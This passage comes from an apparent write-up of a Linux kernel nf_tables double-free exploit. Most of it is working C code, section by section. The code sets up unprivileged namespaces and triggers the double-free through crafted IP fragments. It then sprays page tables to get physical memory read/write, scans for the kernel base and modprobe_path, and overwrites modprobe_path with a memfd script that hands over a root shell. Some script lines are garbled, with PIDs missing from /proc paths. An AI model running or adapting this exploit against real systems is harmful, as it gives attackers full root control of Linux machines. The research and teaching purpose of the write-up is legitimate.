For the LPE exploit, we need the unprivileged-user namespaces option set to access nf_tables. This should be enabled by default on major distro's like Debian and Ubuntu. As such, those distrobutions have a bigger attack surface than distro's which do not allow unprivileged usernamespaces. This can be checked using sysctl kernel.unprivileged_userns_clone, and 1 means it is enabled:

$ sysctl kernel.unprivileged_userns_clone
kernel.unprivileged_userns_clone = 1

Codeblock 5.1.1.1.1: The CLI command for checking if unprivileged user namespaces are enabled.

We create the required user and network namespaces in the exploit using:

static void do_unshare()
{
    int retv;

    printf("[*] creating user namespace (CLONE_NEWUSER)...\n");
    
	// do unshare seperately to make debugging easier
    retv = unshare(CLONE_NEWUSER);
	if (retv == -1) {
        perror("unshare(CLONE_NEWUSER)");
        exit(EXIT_FAILURE);
    }

    printf("[*] creating network namespace (CLONE_NEWNET)...\n");

    retv = unshare(CLONE_NEWNET);
    if (retv == -1)
	{
		perror("unshare(CLONE_NEWNET)");
		exit(EXIT_FAILURE);
	}
}

Codeblock 5.1.1.1.2: The do_unshare() exploit function written in C, which creates the user and network namespaces.

Afterwards, we give ourselves namespace root access by setting UID/GID mappings using:

static void configure_uid_map(uid_t old_uid, gid_t old_gid)
{
    char uid_map[128];
    char gid_map[128];

    printf("[*] setting up UID namespace...\n");
    
    sprintf(uid_map, "0 %d 1\n", old_uid); 
    sprintf(gid_map, "0 %d 1\n", old_gid);

    // write the uid/gid mappings. setgroups = "deny" to prevent permission error 
    PRINTF_VERBOSE("[*] mapping uid %d to namespace uid 0...\n", old_uid);
    write_file("/proc/self/uid_map", uid_map, strlen(uid_map), 0);

    PRINTF_VERBOSE("[*] denying namespace rights to set user groups...\n");
    write_file("/proc/self/setgroups", "deny", strlen("deny"), 0);

    PRINTF_VERBOSE("[*] mapping gid %d to namespace gid 0...\n", old_gid);
	write_file("/proc/self/gid_map", gid_map, strlen(gid_map), 0);

#if CONFIG_VERBOSE_
    // perform sanity check
    // debug-only since it may be confusing for users
	system("id");
#endif
}

Codeblock 5.1.1.1.3: The configure_uid_map() exploit function written in C, which sets up the user and group mappings.

5.1.1.2. Nftables

In order to trigger the bug, we need to set up hooks/rules with the malicious verdict. I will not display the full code here to prevent clutter, so feel free to check the Github repo. However, I use the function below to set the precise verdict.

// set rule verdict to arbitrary value
static void add_set_verdict(struct nftnl_rule *r, uint32_t val)
{
	struct nftnl_expr *e;

	e = nftnl_expr_alloc("immediate");
	if (e == NULL) {
		perror("expr immediate");
		exit(EXIT_FAILURE);
	}

	nftnl_expr_set_u32(e, NFTNL_EXPR_IMM_DREG, NFT_REG_VERDICT);
	nftnl_expr_set_u32(e, NFTNL_EXPR_IMM_VERDICT, val);

	nftnl_rule_add_expr(r, e);
}

Codeblock 5.1.1.2.1: The add_set_verdict() exploit function written in C, which registers the malicious Netfilter verdict causing the bug.

5.1.1.3. Pre-allocations

Before we start the actual exploitation part of the program, we need to pre-allocate some objects to prevent allocator noise, since there may be sensitive areas in the exploit where it may fail if there is too much noise in the background. This is not rocketscience, and more of a chore than technical magic.

Note the CONFIG_SEC_BEFORE_STORM which waits for all allocations in the background to finish, in case some allocations are happening across CPUs. This considerably slows down the exploit (1 second -> 11 seconds), but it definitively increases exploit stability on systems where there may be a lot of background noise. Ironically enough, the success rate increased 93% -> 99,4% (n=1000) without the sleep, on systems with barely any workload (like the kernelctf image), so play around with this value as you like.

static void privesc_flh_bypass_no_time(int shell_stdin_fd, int shell_stdout_fd)
{
	unsigned long long *pte_area;
	void *_pmd_area;
	void *pmd_kernel_area;
	void *pmd_data_area;
	struct ip df_ip_header = {
		.ip_v = 4,
		.ip_hl = 5,
		.ip_tos = 0,
		.ip_len = 0xDEAD,
		.ip_id = 0xDEAD, 
		.ip_off = 0xDEAD,
		.ip_ttl = 128,
		.ip_p = 70,
		.ip_src.s_addr = inet_addr("1.1.1.1"),
		.ip_dst.s_addr = inet_addr("255.255.255.255"),
	};
	char modprobe_path[KMOD_PATH_LEN] = { '\x00' };

	get_modprobe_path(modprobe_path, KMOD_PATH_LEN);

	printf("[+] running normal privesc\n");

    PRINTF_VERBOSE("[*] doing first useless allocs to setup caching and stuff...\n");

	pin_cpu(0);

	// allocate PUD (and a PMD+PTE) for PMD
	mmap((void*)PTI_TO_VIRT(1, 0, 0, 0, 0), 0x2000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_SHARED | MAP_ANONYMOUS, -1, 0);
	*(unsigned long long*)PTI_TO_VIRT(1, 0, 0, 0, 0) = 0xDEADBEEF;

	// pre-register sprayed PTEs, with 0x1000 * 2, so 2 PTEs fit inside when overlapping with PMD
	// needs to be minimal since VMA registration costs memory
	for (unsigned long long i=0; i < CONFIG_PTE_SPRAY_AMOUNT; i++)
	{
		void *retv = mmap((void*)PTI_TO_VIRT(2, 0, i, 0, 0), 0x2000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_SHARED | MAP_ANONYMOUS, -1, 0);

		if (retv == MAP_FAILED)
		{
			perror("mmap");
			exit(EXIT_FAILURE);
		}
	}

	// pre-allocate PMDs for sprayed PTEs
	// PTE_SPRAY_AMOUNT / 512 = PMD_SPRAY_AMOUNT: PMD contains 512 PTE children
	for (unsigned long long i=0; i < CONFIG_PTE_SPRAY_AMOUNT / 512; i++)
		*(char*)PTI_TO_VIRT(2, i, 0, 0, 0) = 0x41;
	
	// these use different PTEs but the same PMD
	_pmd_area = mmap((void*)PTI_TO_VIRT(1, 1, 0, 0, 0), 0x400000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_SHARED | MAP_ANONYMOUS, -1, 0);
	pmd_kernel_area = _pmd_area;
	pmd_data_area = _pmd_area + 0x200000;

	PRINTF_VERBOSE("[*] allocated VMAs for process:\n  - pte_area: ?\n  - _pmd_area: %p\n  - modprobe_path: '%s' @ %p\n", _pmd_area, modprobe_path, modprobe_path);

	populate_sockets();

	set_ipfrag_time(1);

	// cause socket/networking-related objects to be allocated
	df_ip_header.ip_id = 0x1336;
	df_ip_header.ip_len = sizeof(struct ip)*2 + 32768 + 8 + 4000;
	df_ip_header.ip_off = ntohs((8 >> 3) | 0x2000);
	alloc_intermed_buf_hdr(32768 + 8, &df_ip_header);

	set_ipfrag_time(9999);

	printf("[*] waiting for the calm before the storm...\n");
	sleep(CONFIG_SEC_BEFORE_STORM);

    // ... (rest of the exploit)
}

Codeblock 5.1.1.3.1: Partial code for the exploit written in C, which pre-allocates objects to reduce noise on the kernel page allocators.

5.1.2. Performing double-free

Performing the double-free is the most tricky part of the exploit as we need to play with IPv4 networking code and the page allocators. In this section we will perform it so we can obtain arbitrary, unlimited r/w to any physical memory page with Dirty Pagedirectory in the next section, which is ironically enough a lot easier.

5.1.2.1. Reserving clean skb's for masking

In order to allocate skb's before the double-free (which we free in between the double-free to avoid detection and for stability), the exploit sends UDP packets to its own UDP listener socket. Until the UDP listener recv()'s the packets, they will remain in memory as seperate skb's.

void send_ipv4_udp(const char* buf, size_t buflen)
{
    struct sockaddr_in dst_addr = {
		.sin_family = AF_INET,
        .sin_port = htons(45173),
		.sin_addr.s_addr = inet_addr("127.0.0.1")
	};

	sendto_noconn(&dst_addr, buf, buflen, sendto_ipv4_udp_client_sockfd);
}

Codeblock 5.1.2.1.1: The send_ipv4_udp() exploit function written in C, which abstracts away networking data.

static void alloc_ipv4_udp(size_t content_size)
{
	PRINTF_VERBOSE("[*] sending udp packet...\n");
	memset(intermed_buf, '\x00', content_size);
	send_ipv4_udp(intermed_buf, content_size);
}

static void privesc_flh_bypass_no_time(int shell_stdin_fd, int shell_stdout_fd)
{
    // ... (setup code)

    // pop N skbs from skb freelist
	for (int i=0; i < CONFIG_SKB_SPRAY_AMOUNT; i++)
	{
		PRINTF_VERBOSE("[*] reserving udp packets... (%d/%d)\n", i, CONFIG_SKB_SPRAY_AMOUNT);
		alloc_ipv4_udp(1);
	}

    // ... (rest of the exploit)
}

Codeblock 5.1.2.1.2: Partial code for the exploit written in C, which allocated UDP packets to spray sk_buff objects, for free-usage later.

5.1.2.2. Triggering double-free 1st free

In order to trigger the double-free I send an IP packet which triggers the nftables rule we set up earlier. It is an arbitrary protocol excluding TCP and UDP, because they would get passed on to the TCP/UDP handler code which would panic the kernel due to data corruption.

Note the usage of the IP_MF flag (0x2000) in the offset field of IP header, which we use to force the skb into an IP fragment queue, and free the skb at will later by sending the "completing" fragment. Also note that the size of this skb determines the double-free size. If we allocate a packet with 0 bytes content, the allocated skb head object will be in kmalloc-256 (because of metadata), but if we allocate an packet with 32768 bytes, it will be order 4 (16-page from the buddy-allocator).

static char intermed_buf[1 << 19]; // simply pre-allocate intermediate buffers

static int sendto_ipv4_ip_sockfd;

void send_ipv4_ip_hdr(const char* buf, size_t buflen, struct ip *ip_header)
{
	size_t ip_buflen = sizeof(struct ip) + buflen;
    struct sockaddr_in dst_addr = {
		.sin_family = AF_INET,
		.sin_addr.s_addr =  inet_addr("127.0.0.2")  // 127.0.0.1 will not be ipfrag_time'd. this can't be set to 1.1.1.1 since C runtime will prob catch it
	};

    memcpy(intermed_buf, ip_header, sizeof(*ip_header));
	memcpy(&intermed_buf[sizeof(*ip_header)], buf, buflen);

	// checksum needds to be 0 before
	((struct ip*)intermed_buf)->ip_sum = 0;
	((struct ip*)intermed_buf)->ip_sum = ip_finish_sum(ip_checksum(intermed_buf, ip_buflen, 0));

	PRINTF_VERBOSE("[*] sending IP packet (%ld bytes)...\n", ip_buflen);

	sendto_noconn(&dst_addr, intermed_buf, ip_buflen, sendto_ipv4_ip_sockfd);
}

Codeblock 5.1.2.2.1: The send_ipv4_ip_hdr() exploit function written in C, which abstracts away checksumming and socket code, when trying to send a raw IP packet.

static char intermed_buf[1 << 19];

static void send_ipv4_ip_hdr_chr(size_t dfsize, struct ip *ip_header, char chr)
{
	memset(intermed_buf, chr, dfsize);
	send_ipv4_ip_hdr(intermed_buf, dfsize, ip_header);
}

static void trigger_double_free_hdr(size_t dfsize, struct ip *ip_header)
{
	printf("[*] sending double free buffer packet...\n");
	send_ipv4_ip_hdr_chr(dfsize, ip_header, '\x41');
}

static void privesc_flh_bypass_no_time(int shell_stdin_fd, int shell_stdout_fd)
{
    // ... (skb spray)

    // allocate and free 1 skb from freelist
	df_ip_header.ip_id = 0x1337;
	df_ip_header.ip_len = sizeof(struct ip)*2 + 32768 + 24;
	df_ip_header.ip_off = ntohs((0 >> 3) | 0x2000);  // wait for other fragments. 8 >> 3 to make it wait or so?
	trigger_double_free_hdr(32768 + 8, &df_ip_header);

    // ... (rest of the exploit)
}

Codeblock 5.1.2.2.2: Partial code for the exploit written in C, which sends the raw IP packet and triggers the nf_tables rule we set up earlier.

5.1.2.3. Masking the double-free with skb's

In order to prevent detection of the double-free and to improve stability of the exploit, we spray-free the UDP packets we allocated earlier.

static char intermed_buf[1 << 19]; // simply pre-allocate intermediate buffers

static int sendto_ipv4_udp_server_sockfd;

void recv_ipv4_udp(int content_len)
{
    PRINTF_VERBOSE("[*] doing udp recv...\n");
    recv(sendto_ipv4_udp_server_sockfd, intermed_buf, content_len, 0);

	PRINTF_VERBOSE("[*] udp packet preview: %02hhx\n", intermed_buf[0]);
}

Codeblock 5.1.2.3.1: The recv_ipv4_udp() exploit function written in C, which abstracts away socket code when receiving an UDP packet.

static void privesc_flh_bypass_no_time(int shell_stdin_fd, int shell_stdout_fd)
{
    // ... (trigger doublefree)

	// push N skbs to skb freelist
	for (int i=0; i < CONFIG_SKB_SPRAY_AMOUNT; i++)
	{
		PRINTF_VERBOSE("[*] freeing reserved udp packets to mask corrupted packet... (%d/%d)\n", i, CONFIG_SKB_SPRAY_AMOUNT);
		recv_ipv4_udp(1);
	}

    // ... (rest of the exploit)
}

Codeblock 5.1.2.3.2: Partial code for the exploit written in C, which frees the previously allocated sk_buff objects.

5.1.2.4. Spraying PTEs

In order to spray PTEs we simply access the virtual memory pages in the VMA we registered earlier. Note that a PTE contains 512 pages, and therefore 0x20'0000 bytes. Hence, we access once every 0x20'0000 bytes a total of CONFIG_PTE_SPRAY_AMOUNT times.

In order to simplify this process, I wrote a macro which converts pagetable indices to virtual memory addresses. I.e. mm->pgd[pud_nr][pmd_nr][pte_nr][page_nr] is responsible for virtual memory page PTI_TO_VIRT(pud_nr, pmd_nr, pte_nr, page_nr, 0). For example, mm->pgd[1][0][0][0] refers to the virtual memory page at 0x80'0000'0000.

#define _pte_index_to_virt(i) (i << 12)
#define _pmd_index_to_virt(i) (i << 21)
#define _pud_index_to_virt(i) (i << 30)
#define _pgd_index_to_virt(i) (i << 39)
#define PTI_TO_VIRT(pud_index, pmd_index, pte_index, page_index, byte_index) \
	((void*)(_pgd_index_to_virt((unsigned long long)(pud_index)) + _pud_index_to_virt((unsigned long long)(pmd_index)) + \
	_pmd_index_to_virt((unsigned long long)(pte_index)) + _pte_index_to_virt((unsigned long long)(page_index)) + (unsigned long long)(byte_index)))


static void privesc_flh_bypass_no_time(int shell_stdin_fd, int shell_stdout_fd)
{
    // ... (spray-free skb's)

	// spray-allocate the PTEs from PCP allocator order-0 list
	printf("[*] spraying %d pte's...\n", CONFIG_PTE_SPRAY_AMOUNT);
	for (unsigned long long i=0; i < CONFIG_PTE_SPRAY_AMOUNT; i++)
		*(char*)PTI_TO_VIRT(2, 0, i, 0, 0) = 0x41;
     
    // ... (rest of the exploit)
}

Codeblock 5.1.2.4.1: Partial code for the exploit written in C, which sprays PTE pages and defines a macro to convert pagetable indices to virtual addresses.

5.1.2.5. Triggering double-free free 2

We previously drained the PCP list and allocated a bunch of PTEs on the page entry we freed with free 1. Now, we will do free 2 to use its page freelist entry to allocate an overlapping PMD.

We need to use a very specific combination of IP header options to circumvent certain checks in the IPv4 fragment queue code. For specific details, check the relevant background info and/or technique sections.

static void privesc_flh_bypass_no_time(int shell_stdin_fd, int shell_stdout_fd)
{
    // ... (spray-alloc PTEs)

	PRINTF_VERBOSE("[*] double-freeing skb...\n");

	// cause double-free on skb from earlier
	df_ip_header.ip_id = 0x1337;
	df_ip_header.ip_len = sizeof(struct ip)*2 + 32768 + 24;
	df_ip_header.ip_off = ntohs(((32768 + 8) >> 3) | 0x2000);
	
	// skb1->len gets overwritten by s->random() in set_freepointer(). need to discard queue with tricks circumventing skb1->len
	// causes end == offset in ip_frag_queue(). packet will be empty
	// remains running until after both frees, a.k.a. does not require sleep
	alloc_intermed_buf_hdr(0, &df_ip_header);

    // ... (rest of the exploit)
}

Codeblock 5.1.2.5.1: Partial code for the exploit written in C, which triggers the 2nd free of the double-free and navigates a specific IP fragment queue.

5.1.2.6. Allocating the PMD

Now we have the 2nd freelist entry to the double-freed page (note that it has already been allocated by the PTE, so there are not 2 freelist entries at the same time), we can allocate the overlapping PMD to this page. This is incredibly complicated.

static void privesc_flh_bypass_no_time(int shell_stdin_fd, int shell_stdout_fd)
{
    // ... (free 2 of skb)

	// allocate overlapping PMD page (overlaps with PTE)
	*(unsigned long long*)_pmd_area = 0xCAFEBABE;

    // ... (rest of the exploit)
}

Codeblock 5.1.2.6.1: Partial code for the exploit written in C, which allocates the overlapping PMD page by writing to a userland page.

5.1.2.7. Finding the overlapping PTE

Now we have an overlapping PMD and PTE somewhere, we need to find out which of the sprayed PTEs is the overlapping one. This is a very easy procedure as well, as it involves checking which of the PTE areas has an PTE entry belonging to the PMD area. This is essentially equal to checking if the value is not the original value, indicating the page was overwritten.

In case we want to perform a manual sanity check, we also print physical address 0x0 to the user. This usually belongs to MMIO devices, but will usually look the same.

static void privesc_flh_bypass_no_time(int shell_stdin_fd, int shell_stdout_fd)
{
    // ... (allocate the overlapping PMD page)

	printf("[*] checking %d sprayed pte's for overlap...\n", CONFIG_PTE_SPRAY_AMOUNT);

	// find overlapped PTE area
	pte_area = NULL;
	for (unsigned long long i=0; i < CONFIG_PTE_SPRAY_AMOUNT; i++)
	{
		unsigned long long *test_target_addr = PTI_TO_VIRT(2, 0, i, 0, 0);

		// pte entry pte[0] should be the PFN+flags for &_pmd_area
		// if this is the double allocated PTE, the value is PFN+flags, not 0x41
		if (*test_target_addr != 0x41)
		{
			printf("[+] confirmed double alloc PMD/PTE\n");
			PRINTF_VERBOSE("    - PTE area index: %lld\n", i);
			PRINTF_VERBOSE("    - PTE area (write target address/page): %016llx (new)\n", *test_target_addr);
			pte_area = test_target_addr;
		}
	}

	if (pte_area == NULL)
	{
		printf("[-] failed to detect overwritten pte: is more PTE spray needed? pmd: %016llx\n", *(unsigned long long*)_pmd_area);

		return;
	}

    // set new pte value for sanity check
	*pte_area = 0x0 | 0x8000000000000867;

	flush_tlb(_pmd_area, 0x400000);
	PRINTF_VERBOSE("    - PMD area (read target value/page): %016llx (new)\n", *(unsigned long long*)_pmd_area);

    // (rest of the exploit)
}

Codeblock 5.1.2.7.1: Partial code for the exploit written in C, which allocates the overlapping PMD page by writing to a userland page.

5.1.3. Scanning physical memory

After we have set up the PUD+PMD double alloc, we can leverage the true potential of Dirty Pagedirectory: an kernel-space mirroring attack (KSMA) entirely from userland. We can now write physical addresses as PTE entries to a certain address within the PTE area, and then "dereference" it as a normal page of memory in the PMD area.

In this section, we will acquire the physical kernel base address and then use that to access the modprobe_path kernel variable with read/write privileges.

5.1.3.1 Finding kernel base address

Here, we apply the mentioned physical KASLR bypass to find the physical kernel base. Assuming a device with 8GiB physical memory, that reduces the memory that needs to be scanned from 8GiB to 2MiB worth of pages. Thankfully, we only need around ~40 bytes per page to decide if it is the kernel base, which means we need to read 512 * 40 = 20.480 bytes in the worst case to find the kernel base.

In order to determine if the page is the kernel base, I wrote the get-sig Python scripts, which finds common bytes at the same addresses (signatures), filters out the signatures which are common in physical memory, and converts them into a memcmp statement. By increasing the amount of kernel samples, we can extend the support for other kernels (i.e. other compilers and old versions). The output looks something like the codeblock below.

static int is_kernel_base(unsigned char *addr)
{
	// thanks python
	
	// get-sig kernel_runtime_1
	if (memcmp(addr + 0x0, "\x48\x8d\x25\x51\x3f", 5) == 0 &&
			memcmp(addr + 0x7, "\x48\x8d\x3d\xf2\xff\xff\xff", 7) == 0)
		return 1;

	// get-sig kernel_runtime_2
	if (memcmp(addr + 0x0, "\xfc\x0f\x01\x15", 4) == 0 &&
			memcmp(addr + 0x8, "\xb8\x10\x00\x00\x00\x8e\xd8\x8e\xc0\x8e\xd0\xbf", 12) == 0 &&
			memcmp(addr + 0x18, "\x89\xde\x8b\x0d", 4) == 0 &&
			memcmp(addr + 0x20, "\xc1\xe9\x02\xf3\xa5\xbc", 6) == 0 &&
			memcmp(addr + 0x2a, "\x0f\x20\xe0\x83\xc8\x20\x0f\x22\xe0\xb9\x80\x00\x00\xc0\x0f\x32\x0f\xba\xe8\x08\x0f\x30\xb8\x00", 24) == 0 &&
			memcmp(addr + 0x45, "\x0f\x22\xd8\xb8\x01\x00\x00\x80\x0f\x22\xc0\xea\x57\x00\x00", 15) == 0 &&
			memcmp(addr + 0x55, "\x08\x00\xb9\x01\x01\x00\xc0\xb8", 8) == 0 &&
			memcmp(addr + 0x61, "\x31\xd2\x0f\x30\xe8", 5) == 0 &&
			memcmp(addr + 0x6a, "\x48\xc7\xc6", 3) == 0 &&
			memcmp(addr + 0x71, "\x48\xc7\xc0\x80\x00\x00", 6) == 0 &&
			memcmp(addr + 0x78, "\xff\xe0", 2) == 0)
		return 1;


	return 0;
}

Codeblock 5.1.3.1.1: The is_kernel_base() exploit function written in C, compares memory to signatures of the kernel base.

Now, it is time to scan. We fill the PTE page (which overlaps with the PMD page responsible for pmd_kernel_area) with all 512 pages which could be the kernel base page. If we had to scan more than 512 pages, we simply put the code in a loop with an incrementing PFN (physical address).

To reiterate: it is 512 pages because we are dealing with 8GiB physical memory. If it were 4GiB, it would be 256 pages, since 4GiB / CONFIG_PHYSICAL_START = 256.

When we are setting the PTE entry in the PTE page (pte_area[j] = (CONFIG_PHYSICAL_START * j) | 0x8000000000000867;), we are setting both the PFN (CONFIG_PHYSICAL_START * j) which can be considered the physical address, and the coresponding flags (0x8000000000000867) like the permissions of said page (i.e. read/write).

Remember from the Dirty Pagedirectory section that because of the double-free: mm->pgd[0][1] (PMD) == mm->pgd[0][2][0] (PTE), and therefore mm->pgd[0][1][x] (PTE) == mm->pgd[0][2][0][x] (userland page) with x = 0->511. This means that we can overwrite 512 PTEs in the overlapping PMD with the 512 userland pages. These 512 PTEs are responsible for another 512 userland pages, which means we can set 512 * 512 * 0x1000 = 0x4000'0000 (1GiB) of memory at a time.

For readability I use utilize only 2 PTEs from these 512 PTEs, and respectively use them as pmd_kernel_area (for scanning kernel bases) and pmd_data_area (for scanning kernel memory content).

static void privesc_flh_bypass_no_time(int shell_stdin_fd, int shell_stdout_fd)
{
    // ... (setup dirty pagedirectory)

	// range = (k * j) * CONFIG_PHYSICAL_ALIGN
	// scan 512 pages (1 PTE worth) for kernel base each iteration
	for (int k=0; k < (CONFIG_PHYS_MEM / (CONFIG_PHYSICAL_ALIGN * 512)); k++)
	{
		unsigned long long kernel_iteration_base;

		kernel_iteration_base = k * (CONFIG_PHYSICAL_ALIGN * 512);

		PRINTF_VERBOSE("[*] setting kernel physical address range to 0x%016llx - 0x%016llx\n", kernel_iteration_base, kernel_iteration_base + CONFIG_PHYSICAL_ALIGN * 512);
		for (unsigned short j=0; j < 512; j++)
			pte_area[j] = (kernel_iteration_base + CONFIG_PHYSICAL_ALIGN * j) | 0x8000000000000867;

		flush_tlb(_pmd_area, 0x400000);

		// scan 1 page (instead of CONFIG_PHYSICAL_ALIGN) for kernel base each iteration
		for (unsigned long long j=0; j < 512; j++) 
		{
			unsigned long long phys_kernel_base;
		
			// check for x64-gcc/clang signatures of kernel code segment at rest and at runtime
			// - this "kernel base" is actually the assembly bytecode of start_64() and variants
			// - it's different per architecture and per compiler (clang produces different signature than gcc)
			// - this can be derived from the vmlinux file by checking the second segment, which starts likely at binary offset 0x200000
			//   - i.e: xxd ./vmlinux | grep '00200000:'
			
			phys_kernel_base = kernel_iteration_base + CONFIG_PHYSICAL_ALIGN * j;

			PRINTF_VERBOSE("[*] phys kernel addr: %016llx, val: %016llx\n", phys_kernel_base, *(unsigned long long*)(pmd_kernel_area + j * 0x1000));

			if (is_kernel_base(pmd_kernel_area + j * 0x1000) == 0)
				continue;

            // ... (rest of the exploit)
		}
	}

	printf("[!] failed to find kernel code segment... TLB flush fail?\n");
	return;
}

Codeblock 5.1.3.1.2: A part of the privesc_flh_bypass_no_time() exploit function written in C, where it searches for the physical kernel base address.

5.1.3.2. Finding modprobe_path

Now we found the physical kernel base address, we will scan the memory beyond it. In order to identify modprobe_path, we scan for CONFIG_MODPROBE_PATH ("/sbin/modprobe") with a '\x00' padding up to KMOD_PATH_LEN (256) bytes. We can verify if this address is correct by overwriting it and checking if /proc/sys/kernel/modprobe reflects this change, as this is a direct reference to modprobe_path.

Alternatively, the static usermode helper mitigation may be enabled. Fortunately for us this can be bypassed as well. Instead of searching for "/sbin/modprobe" we will simply search for CONFIG_STATIC_USERMODEHELPER_PATH ("/sbin/usermode-helper") etc. Unfortunately there is no method to verify if this is the correct instance, but there should only be one match.

Then, when the target is found, we will try to overwrite it. If it fails, we will simply continue scanning for another target match.

static void privesc_flh_bypass_no_time(int shell_stdin_fd, int shell_stdout_fd)
{
    // ...

	// range = (k * j) * CONFIG_PHYSICAL_ALIGN
	// scan 512 pages (1 PTE worth) for kernel base each iteration
	for (int k=0; k < (CONFIG_PHYS_MEM / (CONFIG_PHYSICAL_ALIGN * 512)); k++)
	{
		unsigned long long kernel_iteration_base;

        // ... (set 512 PTE entries in 1 PTE page)

		// scan 1 page (instead of CONFIG_PHYSICAL_ALIGN) for kernel base each iteration
		for (unsigned long long j=0; j < 512; j++) 
		{
			unsigned long long phys_kernel_base;

            // ... (find physical kernel base address)

			// scan 40 * 0x200000 (2MiB) = 0x5000000 (80MiB) bytes from kernel base for modprobe path. if not found, just search for another kernel base
			for (int i=0; i < 40; i++) 
			{
				void *pmd_modprobe_addr;
				unsigned long long phys_modprobe_addr;
				unsigned long long modprobe_iteration_base;

				modprobe_iteration_base = phys_kernel_base + i * 0x200000;

				PRINTF_VERBOSE("[*] setting physical address range to 0x%016llx - 0x%016llx\n", modprobe_iteration_base, modprobe_iteration_base + 0x200000);

				// set the pages for the other threads PUD data range to kernel memory
				for (unsigned short j=0; j < 512; j++)
					pte_area[512 + j] = (modprobe_iteration_base + 0x1000 * j) | 0x8000000000000867;

				flush_tlb(_pmd_area, 0x400000);
				
#if CONFIG_STATIC_USERMODEHELPER
				pmd_modprobe_addr = memmem(pmd_data_area, 0x200000, CONFIG_STATIC_USERMODEHELPER_PATH, strlen(CONFIG_STATIC_USERMODEHELPER_PATH));
#else
				pmd_modprobe_addr = memmem_modprobe_path(pmd_data_area, 0x200000, modprobe_path, KMOD_PATH_LEN);
#endif
				if (pmd_modprobe_addr == NULL)
					continue;

#if CONFIG_LEET
				breached_the_mainframe();
#endif

				phys_modprobe_addr = modprobe_iteration_base + (pmd_modprobe_addr - pmd_data_area);
				printf("[+] verified modprobe_path/usermodehelper_path: %016llx ('%s')...\n", phys_modprobe_addr, (char*)pmd_modprobe_addr);

                // ... (rest of the exploit)
			}
			
			printf("[-] failed to find correct modprobe_path: trying to find new kernel base...\n");
		}
	}

	printf("[!] failed to find kernel code segment... TLB flush fail?\n");
	return;
}

Codeblock 5.1.3.2.1: A part of the privesc_flh_bypass_no_time() exploit function written in C, where it searches for the physical modprobe_path address.

5.1.4. Overwriting modprobe_path

Finally: we have read/write access to modprobe_path. Sadly, there's one final challenge left: getting the "real" PID of the exploit so we can execute /proc//fd (the file descriptor containing the privesc script). Checking wether or not it succeeded is done in the next section.

Even if we were using on-disk files, the exploit would need to know the PID, since we would need to use /proc//cwd if we were in a mnt namespace. Of course in practice there are ways to circumvent this - such as using the PID shown in the kernel warning message - but I wanted to make this exploit as universal as possible.

As you can see in the codeblock below, we overwrite modprobe_path or the static usermode helper string with "/proc//fd/", which refers to the privilege escalation script, mentioned in the next sections.

Note that the privilege escalation script (included in this codeblock) uses the PID of the current PID guess for shell purposes and for checking if the guess was correct.

#define MEMCPY_HOST_FD_PATH(buf, pid, fd) sprintf((buf), "/proc/%u/fd/%u", (pid), (fd));

static void privesc_flh_bypass_no_time(int shell_stdin_fd, int shell_stdout_fd)
{
    // ...

	// run this script instead of /sbin/modprobe
	int modprobe_script_fd = memfd_create("", MFD_CLOEXEC);
	int status_fd = memfd_create("", 0);

	// range = (k * j) * CONFIG_PHYSICAL_ALIGN
	// scan 512 pages (1 PTE worth) for kernel base each iteration
	for (int k=0; k < (CONFIG_PHYS_MEM / (CONFIG_PHYSICAL_ALIGN * 512)); k++)
	{
		// scan 1 page (instead of CONFIG_PHYSICAL_ALIGN) for kernel base each iteration
		for (unsigned long long j=0; j < 512; j++) 
		{
			// scan 40 * 0x200000 (2MiB) = 0x5000000 (80MiB) bytes from kernel base for modprobe path. if not found, just search for another kernel base
			for (int i=0; i < 40; i++) 
			{
				void *pmd_modprobe_addr;
				unsigned long long phys_modprobe_addr;
				unsigned long long modprobe_iteration_base;

                // ... (find modprobe_path)

				PRINTF_VERBOSE("[*] modprobe_script_fd: %d, status_fd: %d\n", modprobe_script_fd, status_fd);
				
				printf("[*] overwriting path with PIDs in range 0->4194304...\n");
				for (pid_t pid_guess=0; pid_guess < 4194304; pid_guess++)
				{
					int status_cnt;
					char buf;

					// overwrite the `modprobe_path` kernel variable to "/proc//fd/"
					// - use /proc//* since container path may differ, may not be accessible, et cetera
					// - it must be root namespace PIDs, and can't get the root ns pid from within other namespace
					MEMCPY_HOST_FD_PATH(pmd_modprobe_addr, pid_guess, modprobe_script_fd);

					if (pid_guess % 50 == 0)
					{
						PRINTF_VERBOSE("[+] overwriting modprobe_path with different PIDs (%u-%u)...\n", pid_guess, pid_guess + 50);
						PRINTF_VERBOSE("    - i.e. '%s' @ %p...\n", (char*)pmd_modprobe_addr, pmd_modprobe_addr);
						PRINTF_VERBOSE("    - matching modprobe_path scan var: '%s' @ %p)...\n", modprobe_path, modprobe_path);
					}
						
					lseek(modprobe_script_fd, 0, SEEK_SET); // overwrite previous entry
					dprintf(modprobe_script_fd, "#!/bin/sh\necho -n 1 1>/proc/%u/fd/%u\n/bin/sh 0/proc/%u/fd/%u 2>&1\n", pid_guess, status_fd, pid_guess, shell_stdin_fd, pid_guess, shell_stdout_fd);

					// ... (rest of the exploit)
				}

				printf("[!] verified modprobe_path address does not work... CONFIG_STATIC_USERMODEHELPER enabled?\n");

				return;
			}
			
			printf("[-] failed to find correct modprobe_path: trying to find new kernel base...\n");
		}
	}

	printf("[!] failed to find kernel code segment... TLB flush fail?\n");
	return;
}

Codeblock 5.1.4.1: A part of the privesc_flh_bypass_no_time() exploit function written in C, where it overwrites the modprobe_path kernel variable.

5.1.5. Dropping root shell

In order to drop a rootshell, we execute run the invalid file using modprobe_trigger_memfd(), which takes advantage of the overwritten modprobe_path. The new modprobe_path points to the script (/proc//fd/) below. It writes 1 to the newly allocated status file descriptor, which makes the exploit detect a successfull root shell and stop the execution. Then, it gives a shell to the console.

In order to universally drop a root shell - without making assumptions about namespaces, and keeping it fileless - I "hijack" the stdin and stdout file descriptors from the exploit and forward them to the root shell. This works on local machines, as well as reverse shells. Essentially - without file redirection functionality - the script runs:

#!/bin/sh
echo -n 1 > /proc//fd/
/bin/sh 0/fd/0 1>/proc//fd/1 2>&

Codeblock 5.1.5.1: A BASH script executed as root, to pass the success rate and give the user a shell.

static void modprobe_trigger_memfd()
{
	int fd;
	char *argv_envp = NULL;

	fd = memfd_create("", MFD_CLOEXEC);
	write(fd, "\xff\xff\xff\xff", 4);

	fexecve(fd, &argv_envp, &argv_envp);
	
	close(fd);
}


static void privesc_flh_bypass_no_time(int shell_stdin_fd, int shell_stdout_fd)
{
    // ...

	// run this script instead of /sbin/modprobe
